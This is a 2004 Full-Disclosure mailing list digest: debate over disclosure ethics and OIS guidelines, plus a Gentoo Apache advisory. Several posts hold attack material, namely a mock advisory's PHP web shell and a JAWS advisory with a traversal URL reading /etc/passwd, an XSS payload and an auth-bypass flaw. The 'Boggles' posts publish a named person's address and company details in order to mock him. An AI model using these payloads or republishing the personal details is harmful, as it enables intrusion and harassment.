Yahoo! seem to have very quickly become rivals, with regards of Search
and E-mail.

The things I could tell FD about Yahoo! would rock the Yahoo! Security
Team to it's foundations (and they know it). Luckily for them, I have
morals.

Yahoo! are aware of who I am, even though they know me on another alias.

Cheerio

Maarten wrote:

On Monday 05 July 2004 18:00, System Outage wrote:
> If it's about posting advisories, why do many decide to post the exploit
> along with the advisory. To me this is not a responsible thing to do.
> Whoever knows how many script kiddies are sleeping on this list and taking
> advantage of the free exploit giveaway's seen here.

Can we please not have this discussion again ? Even IF you have a valid
point, this list was conceived to include PoC code, despite the possible evil
consequences. Read the list archives for lots more discussion on this.

> 10 days isn't an awful long time and the vendor never made primary contact
> with the user in question. Meaning, for whatever reason the e-mail may not
> have been delivered and because of this the Gmail Team could easily of been
> caught short on this issue and a seri!
ous hole
exposed to the public, before
> the vendor (Gmail) has had a chance to scramble together an incident
> response and get the hole patched out, before a serious number of account's
> become compromised on the service.

Ten days is more than enough for them to answer "Yes we received your mail /
Yes we're looking into it, it will take some time before we have an update."
Maybe not for microsoft, but what can you do when you receive no reply at all?

And if the email actually did not reach them, all the more reason to post to
this list. How else do you suggest that people become aware of an issue?
Besides, the hole isn't that serious, so where's the fire anyway ?

Maarten

--
Yes of course I'm sure it's the red cable. I guarante[^%!/+)F#0c|'NO CARRIER

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

________________________________
Do you Yahoo!?

New and Improved Yahoo! Mail - Send 10MB messages!

                
---------------------------------
Do you Yahoo!?
New and Improved Yahoo! Mail - Send 10MB messages!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [sb] [ GLSA 200407-03 ] Apache 2: Remote denial of service attack

From: Thierry Carrez (koongentoo.org)
Date: Mon Jul 05 2004 - 16:30:45 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200407-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Apache 2: Remote denial of service attack
      Date: July 04, 2004
      Bugs: #55441
        ID: 200407-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A bug in Apache may allow a remote attacker to perform a Denial of
Service attack. With certain configurations this could lead to a heap
based buffer overflow.

Background
==========

The Apache HTTP Server Project is an effort to develop and maintain an
open-source HTTP server for modern operating systems. The goal of this
project is to provide a secure, efficient and extensible server that
provides services in tune with the current HTTP standards.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 net-www/apache <= 2.0.49-r3 >= 2.0.49-r4
                                                                   < 2

Description
===========

A bug in the protocol.c file handling header lines will cause Apache to
allocate memory for header lines starting with TAB or SPACE.

Impact
======

An attacker can exploit this vulnerability to perform a Denial of
Service attack by causing Apache to exhaust all memory. On 64 bit
systems with more than 4GB of virtual memory a possible integer
signedness error could lead to a buffer based overflow causing Apache
to crash and under some circumstances execute arbitrary code as the
user running Apache, usually "apache".

Workaround
==========

There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version:

Resolution
==========

Apache 2 users should upgrade to the latest version of Apache:

    # emerge sync

    # emerge -pv ">=net-www/apache-2.0.49-r4"
    # emerge ">=net-www/apache-2.0.49-r4"

References
==========

  [ 1 ] Georgi Guninski security advisory #70, 2004
        http://www.guninski.com/httpd1.html
  [ 2 ] CAN-2004-0493
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0493

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-200407-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFA6F1fvcL1obalX08RAhz9AKCPeuWIsRNOW23muPm9Wg8o+4DsIgCeIKFG
tLPdwSIV5gDVQeZB8jcxozo=
=1rY3
-----END PGP SIGNATURE-----

--
 Sie haben den Sicherheitsboten abonniert.
 http://sicherheitsbote.net

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Public Review of OIS Security Vulnerability Reporting and Response Guidelines

From: Florian Weimer (fwdeneb.enyo.de)
Date: Mon Jul 05 2004 - 16:36:23 CDT

> The Organization for Internet Safety (OIS) extends an invitation to
> the readers of the BugTraq, NTBugtraq, and Full-Disclosure mailing
> lists to participate in the ongoing public review of the OIS Security
> Vulnerability Reporting and Response Guidelines.

The definition of the term "security vulnerability" still does not
match current industry practice. Almost all COTS software lacks a
publicly reviewable design document, and popular software has not been
designed for Internet security *at* *all*. In a few cases, this is
even acknowledged by the vendor (think of Microsoft Windows Me or
Microsoft Windows NT).

In fact, I can't think of any recent, critical vulnerability that
matches your definition of a vulnerability.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] ANOTHER 3L33T3 ADVISO AND NOT ON PHP-CASTOR 10.3 BETA (used by 3 peoples on internet) !!! 0DAY EXPLOIT !

From: Rudolf Polzer (divzerogmail.com)
Date: Mon Jul 05 2004 - 16:59:52 CDT

On Mon, 5 Jul 2004 21:20:24 +0200 (CEST), frogmanno-log.org
<frogmanno-log.org> wrote:
> the system() function. This is a very VERY 3v1l backdoor, that allows

I didn't expect that you will actually write that since today is
nowhere April 1th.

If you now find a DoS in a Brainf*** interpreter by coding an endless
loop in Brainf*** you are the first one on my gmail killfile - until
Mar 31th, 2005. Finding the code for an endless loop in Brainf*** will
be your own problem.

Hoping to read REAL advisories again soon

Rudolf Polzer

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Dailydave] Re: [Full-Disclosure] Public Review of OIS Security Vulnerability Reporting and Response Guidelines

From: Halvar Flake (HalVargmx.de)
Date: Mon Jul 05 2004 - 07:47:21 CDT

Hey all,

> It's rare, but there are still security companies and individuals who do
> not owe their entire business to money from Microsoft. It's July 4th.
> and some of us are Americans who understand the concept of independance.

I am not american, but I have to agree to all of the following:

 - Nobody trusts the OIS or its motives.
 - the purpose of the OIS is to lobby towards a business model for Microsoft

  and the other OIS members that involves the removal of non-compliant
 security researchers.
 - This call for feedback is a thinly disguised attempt to get public
 legitimacy and allow the OIS to claim it has community backing, which it
 clearly does not.

Cheers,
Halvar Flake

--
"Sie haben neue Mails!" - Die GMX Toolbar informiert Sie beim Surfen!
Jetzt aktivieren unter http://www.gmx.net/info

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Do not adopt OIS standards (Was: Public Review of OIS Security Vulnerability Reporting and Response Guidelines)

From: Ferguson, Ann (annferduck.wafel.com)
Date: Mon Jul 05 2004 - 17:54:45 CDT

Here is my plea: do not adopt OIS standards, and do not advance OIS
legitimacy by submitting official feedback. This is not a beginning of an
angry rant - please allow me to explain.

I think that OIS guidelines are quite good in suggesting how the
disclosure process should look like. I also think there are numerous cases
when it is a smart idea to follow them. And yet, these very guidelines are
based on a very dangerous concept - that all the vendors and researchers
will share the common goal: customer security.

In free market economy, typical vendor's goals have very little to do with
the desire to offer a true blend of security of functionality; vendors
focus on trying to look good, and to stay competitive. This alone does not
mean they have no interest in improving security of their products, should
the public become concerned, but that's not my point.

The problem is: responsible disclosure policies, once popular enough to
become a de facto standard that research groups wanting to establish
public credibility are expected to follow, give (some) willing vendors a
powerful tool to marginalize or discredit folks who follow different
disclosure practices - particularly ones that are known to cause worse PR
fallout than others.

And now, whereas most of responsible disclosure policies try to claim they
propose a model that offers substantially higher protection of the
end-user against newly disclosed threats (which then is a good foundation
for vendors to rationalize why they should be always notified in generous
advance), these claims are not universally true. Various disclosure models
have been debated for long years, and none had been conclusively shown to
be superior to others; there are good arguments to back any of them, and
in many situations, specifics of an individual case (level of exposure,
anecdotal or first-hand experience with the vendor, etc) should be
considered by the researcher.

One thing we almost all agree on is that without full disclosure and all
the associated PR activity that forces vendors to react, the cyber world
would, after all those years, be a potentially more dangerous place.

Now if you give vendors a tool to effectively (albeit passively) defend
themselves against folks who do not play nice with them, we make it easier
for them to stick with the old and tried reactive security ("fix where it
breaks") model that cost them nothing. In reality, it is the researcher
who should enjoy protection, vendors are not entitled to any. The
researcher should be protected against frivolous lawsuits, threats,
groundless detention, and other wonders that only hurt disclosure. We
need to ENCOURAGE FULL DISCLOSURE, no matter when and how, no matter what
procedures are to be followed or violated. Disclosure is not perfect, but
as far as I can tell, it is (in the long run) far more beneficial to the
Internet as a whole, by keeping vendors accountable, forcing them to
invest in security, and by making their progress verifiable.

And yet, disclosure had suffered greatly in recent years, with the advent
of informal policies and ridiculous laws that discouraged providing
detailed information about flaws - only succeeding in providing a
competitive advantage to commercial security IDSes, IPSes, security
scanners or assessment software over community-based of homebrew products
(by the virtue of the former group having more money and manpower, and
access to "trusted" channels), and not affecting perhaps only black hats,
who usually have enough time on their hands to spend several days digging
through a vague report and analyzing code or reverse-engineering
applications.

There is no need to further advance this - we are not getting any more
secure, and there aren't fewer attacks. If we disclose, let's disclose in
a non-discriminatory manner. Even if we agree with basic OIS policy
premises and see this is a sanely constructed policy, the effects of its
widespread adaptation may be quite far fetched.

Another problem...

OIS is heavily vendor-controlled. This is not a conspiracy theory, just a
matter of facts. Microsoft and "unbreakable" Oracle are two giant market
forces with vital interests in how security disclosure is being handled,
whereas other companies - Foundstone, Stake, Bindview, Guardent - once
reputable names in security research, are nowadays struggling in the
current economy to maintain their market niches. These niches could be
easily "embraced" by Microsoft, and so they are largely on their mercy, as
far as I can tell. Who else? Companies such as ISS or SCO are also likely
to be prone to manipulation, and their ethics are not particularly
well-regarded in the community, rightly or not.

Having a vendor-backed and vendor-controlled policy on how researchers
should "responsibly" report security flaws is a very dangerous game: as I
said, we give them tools to get rid of the type of disclosure that is most
embarrassing and most difficult to handle on PR level, and we get NOTHING
in return. Reactive security and fixing overflows one at a time
(nevertheless taking a month or two to resolve it) is dirt cheap. Although
OIS policies might be now considered a set of informational suggestions,
they work hard to establish them more firmly; the language used in those
documents (with all the "requirements" and such) leaves little doubt this
is meant to be a policy that is expected to be enforced (even if only by a
community policy).

In this particular case, since OIS is not representative of any major,
independent security research forces, and has close "evil vendor" ties
instead, it appears to be risky to give any legitimacy to procedures and
policies that may be used to, in turn, give legitimacy to the organization
itself.

Keep in mind that, even if you disagree with my objections to their
policies themselves, as soon OIS becomes a widely accepted and recognized
icon, these documents may gradually evolve in a manner that is even less
beneficial to the general public. Since the process of "public review and
discussion" is nowhere near being transparent, and the policy-making body
is closed, the situation is simply quite unhealthy.

Again, I am *NOT* advocating any disclosure scheme or timeline, I simply
oppose further advancing imbalance of power.

I ask you not to support OIS, even if you believe the policy is sane and
you hold no grudge against any of the members. If you feel like making the
cyber-world a better place, donate to EFF instead.

Ann

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: Public Review of OIS Security Vulnerability Reporting and ResponseGuidelines

From: Randy Bush (randypsg.com)
Date: Mon Jul 05 2004 - 16:29:31 CDT

you mean the organization for information suppression, leaders
in security through obscurity? great plan, eh?

randy

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: Public Review of OIS Security Vulnerability Reporting and Response Guidelines

From: Pete Herzog (peteisecom.org)
Date: Mon Jul 05 2004 - 14:30:34 CDT

All,

The number of researchers locked out of this opinion piece are not alone
in questioning the motives of the OIS. I can only speak for myself but
this process of vulnerability reporting that the OIS suggests is elitist
and unethical. Much more unethical than the releasing of information
publicly to all even if no fix is available.

That there are significant problems with the OIS guidelines is an
understatement. While I agree that there is a need for proposing
guidelines, the actual premise of these particular guidelines
essentially proposes less security. And while the OIS claims it will
not be made into law (http://www.oisafety.org/about.html#6) there is
serious doubt on this premise
(http://www.sbq.com/sbq/vuln_disclosure/sbq_disclosure_liability.pdf) as
existing laws may already be applicable and sure to cause a chilling
effect on security research if these guidelines turn up the heat. Then
the "30 days to disclosure" has no consequence if the research can't be
made in the first place. It would seem that puts the vendor under less
pressure and not more
(http://att.com.com/Panel+defends+flaw+disclosure+guidelines/2100-1002_3-5057914.html).

Another problem is that OIS refused to give independent security
researchers a voice (http://www.oisafety.org/about.html#3) which is the
exact opposite of the claim that the process will actually meet the
needs of the security community (http://www.oisafety.org/about.html#4).
  There can be no positive, security reason for this. Are we to assume
that, as according to your guidelines, you will take feedback from all
who are not independent security researchers? How is that label even
defined? How is one a "dependent security researcher" if not dependent
to the vendor?

As if locking out non-vendor-related researchers is not enough, it
becomes even more suspect. Section 2.3 Timeline proposes that the
system be elitist with no mention of how these first-choice groups are
who get the information or how abuse will be handled by those who break
the OIS code of ethics for sharing it with customers, selling it or
auctioning this early warning information. If exploit code is not
allowed and OIS has "no illusions"
(http://www.oisafety.org/about.html#12) that others may already have it,
then why the elitism on who gets to know about it first? This brings me
to the key issue.

The largest problem is that these guidelines don't scale much past the
present where vulnerabilities at worst cause a loss of money. Therefore,
I can't imagine a future where it works when human lives are directly
affected. Vulnerability disclosure aside, it's always better to have
the choice to hear warnings and make rational choices on those warnings
because only the choice maker knows the true value of those choices.
OIS is proposing otherwise (http://www.oisafety.org/about.html#10 and
the "...no illusions...." in
http://www.oisafety.org/about.html#12). Witholding information in an
elitist manner and not giving the public the choice to make their own
security decisions is wrong and unethical.

The OIS committee and guidelines as they stand are absolutely the wrong
foot forward to this future. Not only security researchers should be
angry with this proposal.

Sincerely,
-pete.

Pete Herzog
Managing Director, ISECOM
www.isecom.org

dave wrote:

> Nobody trusts the OIS or its motives. I imagine this is similar to the
> feedback you've gotten from everyone else as well, but Immunity has no
> plans to subscribe to your guidelines, and is going to oppose any
> efforts you make to legislate those guidelines as law. In section 1.1
> the draft proposes that the purpose of the OIS's model is to protect
> systems from vulnerabilities. This is fairly obviously untrue - the
> purpose of the OIS is to lobby towards a business model for Microsoft
> and the other OIS members that involves the removal of non-compliant
> security researchers.
>
> This call for feedback is a thinly disguised attempt to get public
> legitimacy and allow the OIS to claim it has community backing, which it
> clearly does not.
>
> It's rare, but there are still security companies and individuals who do
> not owe their entire business to money from Microsoft. It's July 4th.
> and some of us are Americans who understand the concept of independance.
>
> Dave Aitel
> Immunity, Inc.
>
>
>
>
> OIS wrote:
>
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA1
>>
>> The Organization for Internet Safety (OIS) extends an invitation to
>>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] On full-disclosure and wiretapping

From: hggdh (hggdhcomcast.net)
Date: Mon Jul 05 2004 - 19:05:53 CDT

Hello,

 The Register has, today, this nice article (by extension, from
 SecurityFocus, so blast away):

 http://www.theregister.co.uk/2004/07/05/close_email_wiretap_loophole/

 So... isn't it full-disclosure when anyone can read any e-mail
 legally?

--
 ..hggdh..

-----BEGIN PGP MESSAGE-----
Version: GnuPG v1.2.4 (MingW32)

iD8DBQFA6ezhVFMjkob7xf8RAvTIAJ4sYSAY4juuWmg59pmAdOt8dosQQgCgi0JF
ur+nmeVbUoiNbaVsYXuKyCE=
=qr4D
-----END PGP MESSAGE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: System Outage wrote:

From: Boggles (boggleshush.com)
Date: Mon Jul 05 2004 - 09:33:58 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Good morning FD fans,

Boggles has Hangover this morning, Too much Boggle juice ingestion.
(Boggles talented like that, Boggles flexible friend!).

Boggles think he have to ask Schools to have 50 week holidays as System
Outage has added pure comedy to the last few days.

Boggles would like to apologise to world for not Oreilly-ing advisories
earlier.

Boggles has managed to focus half a retina to decode Boggles' Inbox.

Boggles appreciate the fan mail. But if Boggles Fans not careful Boggles
have to sell Full-Disclosure email's to iDefense to pay for more mailbox.

(With the exception of System Outage email, even iDefense would think
uber Boggles was taking the Spitzner)

P.S Boggle's luv u all (mostly).

So, without further a do or don't:

Boggle's Delayed Reaction Advisorys are proud to present:

A Boggles Special:
*********************************************
  !SPECIAL BOGGLES SPECIAL BOGGLES SPECIAL!
*********************************************

<so1o> got my first book copy from oreilly today
  ++ Boggles knew he should have done something about that.
  ++ Boggles is sorry for failing the community and letting so1o
  ++ publish Network SA.

  ++ Boggles Hopes he can make up for this by asking the English
  ++ Government
  ++ why so1o's company was in liquidation, hadn't filled in a tax
  ++ return, but was still trading. (companieshouse.gov.uk)

<so1o> i hate report writing
  ++ Boggles think he mention this already.

  ++ Boggles doesn't like so1o
  ++ (Boggles jealous, Boggles want Beastiality Book cover.)

  ++ So Boggles is going to include more so1o information.
  Name: Chris McNab
  Company: Matta Consulting Limited
  Email: chris.mcnabtrustmatta.com
  Company website: trustmatta.com
  Domain registrant: (Boggles good with `whois`!!)
  Matta Security
  18 Duncan Terrace
  London London
  N1 8BZ
  UK
  nickbasketthotmail.com

  ++ Boggles visit London.
  (I didn't meet the queen tho,
  On that topic, who seen Spitzner lately?)

  Name & Registered Office :
  MATTA CONSULTING LIMITED
  314 5102
  ST JAMES BARTON
  BRISTOL
  AVON BS1 3LY
  Status :Active(ly wh0ring). [Boggles didn't at that, honest.]
  Company No. :03629907
  Date of Incorporation : 11/09/1998

  Country of Origin : United Kingdom

  Company Type: Private Limited Company
  Nature Of Business (SIC(92)):
  7487 - other business activities [wh0ring]

  Accounting Reference Date : 30/09
  Last Accounts Made Up To : 30/09/2002 (TOTAL EXEMPTION FULL)
  Next Accounts Due : 30/07/2004 [ohh, Boggles enjoy 'dem!]
  Last Return Made Up To : 11/09/2003
  Next Return Due : 09/10/2004

  Last Members List : 11/09/2003 [#phrack]

  Previous Names [Christina]
  Date of Change : Previous Name :
  25/04/2003 NETWORK SECURITY SOLUTIONS LTD.

  Branch Details
  There are no branches associated with this company.
  [If statements would be too ub3r]

  Oversea Company Information
  There are no Oversea Details associated with this company.
  [Oh, dat's a fib]

  Boggles suggest groups.google.com for nickbasketthotmail.com (it
  funny).

  using his signature:
  "many thanks, Nick Baskett" is funnier. play "follow the work trail"

  Boggles enjoy that game.

  Chris says he works with the British "High Tech Crime Unit"
  (yes the ones who took months to bring the site live because they
  were.."concerned about security")

  Boggles spoke to LOTS of people.

  Boggles think's Chris tell weeny fibblet

  Chris should pay ALL money that he has made
  (potentially illegally if he hasn't done his paperwork)
  to the Amazon rainforest. He has wasted so many _FUCKING_
  trees copying and pasting from the internet.

  Boggles is sorry to the kids for using nasty word like "amazon".

-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkDpZtMACgkQ2IK15vxw2kNLVwCguXL2WEYmibb5clibn4wZj8pdxo4A
n11Etl37enOAtn49O/Q8APoVsv/Q
=VXqv
-----END PGP SIGNATURE-----

Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434

Promote security and make money with the Hushmail Affiliate Program:
http://www.hushmail.com/about-affiliate?l=427

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Fw: [Full-Disclosure] ANOTHER 3L33T3 ADVISO AND NOT ON PHP-CASTOR 10.3 BETA (used by 3 peoples on internet) !!! 0DAY EXPLOIT !

From: Frog Man (leseulfroghotmail.com)
Date: Mon Jul 05 2004 - 16:59:08 CDT

This advisory was not written by me. It's a fake.

bye

frog-mn

>----- Original Message -----
>From: <frogmanno-log.org>
>To: <full-disclosurelists.netsys.com>
>Sent: Monday, July 05, 2004 9:20 PM
>Subject: [Full-Disclosure] ANOTHER 3L33T3 ADVISO AND NOT ON PHP-CASTOR 10.3
>BETA (used by 3 peoples on internet) !!! 0DAY EXPLOIT !
>
>
> > This is IHCTEAM material. We fuck blackhats and we own the planet. This
>is
> > a leet advisory, s0 l33t. Just read it and be quiet.
> >
> > ---------------------------
> >
> > IHC TEAM private work, all the fame become to IHC TEAM and the leetest
>mr.
> > Frog-mn !!!!
> >
> > Product: PHP
> > Version: all
> > Security level: Very high baby !!!
> >
> >
> > What's the problem ?
> > ==================
> >
> > There is a BIG 1337 BUG 0day in all the php versions for ever never.
>This
> > bug is caused by
> > the system() function. This is a very VERY 3v1l backdoor, that allows
> > execution of
> > arbitrary shell command. This backdoor has been coded by ZyXyS from
>HACK3R
> > c0rp0r4ti0n (c) (TM) (R).
> >
> > Because we want fame, we'll explain you da bug:
> > l00k at th1s 3v1l code:
> >
> > <?
> > system("$cmd");
> > ?>
> >
> > *TADAAAA* !
> >
> >
> > If this code is on a webserver, a malicious user (like ZyXyS) can exec
> > EVERYTHING and own EVERYWHERE.
> > Example:
> > www.thc-is-lame.org/page.php?cmd=ls%20/tmp
> >
> > It will give you:
> >
> > tmp-shells-owned-with-THC-Hydra-fucking-lame-kiddy-tool.txt
> > adore.tar.gz
> > last-10-leaked-exploits.tar.gz
> >
> >
> > You see, you can rock.
> > So, at this point we can see that ZyXyS is a very leet guy: THIS
>BACKDOOR
> > is less detectable than
> > a LKM BACKDOOR like adore.tar.gz (<--- hahaha).
> >
> > I release this vulnerability because the K-otik team (www.k-otik.com)
> > owned ZyXyS 10 days ago
> > (after the fbi) and discovered the backdoor, and k-otik wanted to write
>an
> > advisory, ONLY FOR FAME
> > AND MONEY. I want this fame (but for the money, I don't mind, I am rich
> > because I sell 0day,
> > traded on #darknet, to idefense), so I had to release the bug before
>K-otik.
> > k-otik is like hack.co.za, they release everything and nothing, but they
> > can't code their own exploit.
> >
> >
> > Greets:
> > ======
> >
> > Rudolf Polzer (divzerogmail.com): Thank to his idea to disclose this
>bug
> > and if you have another idea
> > for us mail me
> > packetstormsecurity: they give us kiddie-friendly exploits and mass
>rooters
> > spender: he sells good security patches
> > isec: now my grandmother can r00t linux boxes
> > bugtraq: they leak bugs found by ugly blackhats, which worked a lot of
> > time to discover them
> > espionet guys: they represented very well the hacker scene in a TV show
> > with their netbus
> > (please don't open my cdrom device guys)
> >
> >
> > Fame:
> > ====
> >
> >
> > We already owned everyone and everything with these exploits years ago,
> > and in
> > fact we've all had them sitting on the shelf gathering dust due to lack
>of
> > new targets.
> >
> > FUN TESTED IDEAS:
> >
> > www.team-teso.net (down because of us)
> > www.thc.org (haha owned 10 times)
> > www.securityfocus.com
> >
> >
> > It was very funny to read .gov and .mil files.
> >
> > WARNING !!!
> >
> > /!\ WE ARE LOOKING FOR A JOB IN THE SECURITY RESEARCH /!\
> >
> > Visit us:
> >
> > www.ihcteam.com
> > www.newffr.com
> > www.espionet.net
> > www.underground-fr.org
> > www.phpsecure.com
> >
> >
> > ---------------------------
> >
> > We n33d f4me, m0n3y, g1rls and m0nk3ys, so VIVA EL DISCLOSURO.
> >
> > ---- fr0g-mn ----
> >
> >
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_________________________________________________________________
Des centaines de jobs de rêve on-line. http://www.fr.msn.be/job/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] full-disclosurelists.netsys.com

mohrtemerity.net
Date: Mon Jul 05 2004 - 12:33:30 CDT

The whole gmail flame war kind of pisses me off. This *is*
full-disclosure. The people who state that flaws in beta software should
not be reported here are being counter-productive to the goals of this
list: release of software security holes to teh general public.

If you're worried about "script kiddie sleepers" on this list, perhaps (as
another posted mentioned) you should rethink your subscription. So-called
script kiddies need access to this information if they want to learn how
these things work.

Ethics are not an issue here. We do not (AFAIK) advocate illegal
activity, and if this information is used for such purposes, that is
beyond the scope of this list. Ethics are determined on a person by
person basis and should not be applied to a large group of individuals.
Your ethics are probably vastly different from the ethics of another
individual on the other side of the globe. Face it: this information is
posted solely for release -- what is done with it it up to the end users.

In short: stop whining and go get a life -- put up or shut up.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] New Boggles Poll.

From: Boggles (boggleshush.com)
Date: Mon Jul 05 2004 - 12:31:27 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Boggles believes that everyone should be given fair hearing.

"pardon?"
<insert canned laughter reserved for Theo here>

Boggles sad that not all Boggles posts allowed to FD.
Email Boggles if you would like the Posts that Mr(s) Moderator (will
you marry me?) won't approve (Boggles not say that FD is Moderated, just
Boggles FD is moderated.

"All" FD-posters "are created" un moderated "but some are more"
un-moderated "than others".

Boggles will resort to Altervative methods if Boggles must. (may involve
Pole dancing, Wiccan chanting, appealing to the Priory of Sion or similar)

So Boggles decided on a new poll:
If you believe the following statement is true, please email Boggles

Statement: "System Outage isn't a Prick"

Be sure to strcpy(msg->subject,"I beeleeve in a thang called luuuurve");
in your e-vote.

Poll Rules: If you are in anyway directly or indirectly linked with System
Outage you can't vote. (Inderect is defined as: "anyone who knows System
Outage exist's" [albeit in his little "I kant join duts they dun gimmah
penceel" manner.)

Boggles hope to be second successful e-vote on FD

Boggles remind everyone that BSS' vote on friend Drew Copley is still
going: drewpollbugtraq.org is the email address.

Boggles expects to publish the results for Boggles' poll within 24 hours,
 Boggles will be using three-one-three-three-seven custom counter for
votes:

struct system_outage_vote {
unsigned vote_count:1;
}so_vote;

Boggles see no problem, hear no problem.

- --
Boggles Funniest Quotes:

"The Power of Intelligence"
  ++ iDefense.
  ++ [ Boggles wonder if this explain the power outage.]
  (see shiftee, I said I could use iDefense quote!)
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkDpkGwACgkQ2IK15vxw2kNDHQCbBzfl9Xb2PCSNXZdrhLNNiHdftikA
nAht0nRypmzPeItuUrlgYcd/mBap
=WbWr
-----END PGP SIGNATURE-----

Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434

Promote security and make money with the Hushmail Affiliate Program:
http://www.hushmail.com/about-affiliate?l=427

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Multiples vulnerabilities in JAWS

nandogigax.org
Date: Tue Jul 06 2004 - 02:19:48 CDT

check this...

/////////////////////////////////////////////////////

//// Vulnerable Program: JAWS
////
//// Version : 0.3 ; it's BETA probably ;)
////
//// Url: http://www.jaws.com.mx
////
//// The Bug: Multiples vulnerabilities
////
//// Date: Today, July 5 off 2004
////
//// Author: Fernando Quintero (a.k.a nonroot)
//// Email: nandogigax.org

//////////////////////////////////////////////////////

I. Affected software description:

 Jaws is a Framework and Content Management System for building dynamic
web sites.
 It aims to be User Friendly giving ease of use and lots of ways to
customize web sites,
 but at the same time is Developer Frendly, it offers a simple and
powerful framework to hack
 your own modules. Jaws is Free Software under the GPL.

 note: to hack your own modules, to hack your own modules, to hack your
own modules... ;)

II. Bugs

There are some vulnerabilities in the jaws code, it's were fixed quickly
by your main coder.

1) Full path disclosure ...

There are many ways to determine the full path to the web root directory:

a) http://127.0.0.1/jaws/index.php?gadget=filebrowser&path=/etc

    Specifying a variable path, that does not exist.

b) function jaws_error($text, $file, $line)
         {
             print ("<b style=\"color: #f00;\" JAWS
Error:</b><br/>".$text."<br/><i> ".$text."<br/><i>".$file.",line
".$line);
         exit;
         }

    The jaws_error() function, it returns the line and the full path to
the name of the file.

c) http://127.0.0.1/jaws/include/config.php

    Trying to open some file in the include directory.

2) Arbitrary file browsing.

We can acceded to the file's content through the variable gadget.

http://127.0.0.1/jaws/index.php?gadget=../../../../../../../../../../etc/passwd%00&path=/etc

This line show us the passwd file.

The use of the "path" variable is irrelevant, in the code can be seen a
line like:

$path= str_replace ("..","",$path) --> at this way we filter the content
of path, but in the

index.php file the "gadget" variable is not filter.

The "%00" is necessary because the script adds at the end of the name of
"gadget" variable the extencion ".php"

3) XSS (the fashionable word)

Cross site scripting in the variable action, because it script returns
the content of the variable:

        http://127.0.0.1/jaws/index.php?gadget=[a valid gadget]&action=<b>bold
letter</b>
        http://127.0.0.1/jaws/index.php?gadget=[a valid
gadget]&action=<script>alert('Colombia Rulx!!');</script>

In the index.php the vulnerable code is:

jaws_error ("Invalid operation: You can't display this action
[".$go_gadget->name."::".$go_gadget->action."]",__file__,__line__);

where "$go_gadget->action" content the erroneus action.

4) Validation without a password :)

There exist a way that allow us to get in the control panel with
administrator rights without a password.

The admin.php file have:

//

if ($GLOBALS["app"]->logged_on())
{
control panel code...
...
}

//

The logged_on() function is in the application.php file.

The function's code.

//

function logged_on()
    {
        return (md5($_SESSION["logged"]) ==$_COOKIE["logged"]);
    }

//

Is extrange to see this type of validation but there is!.

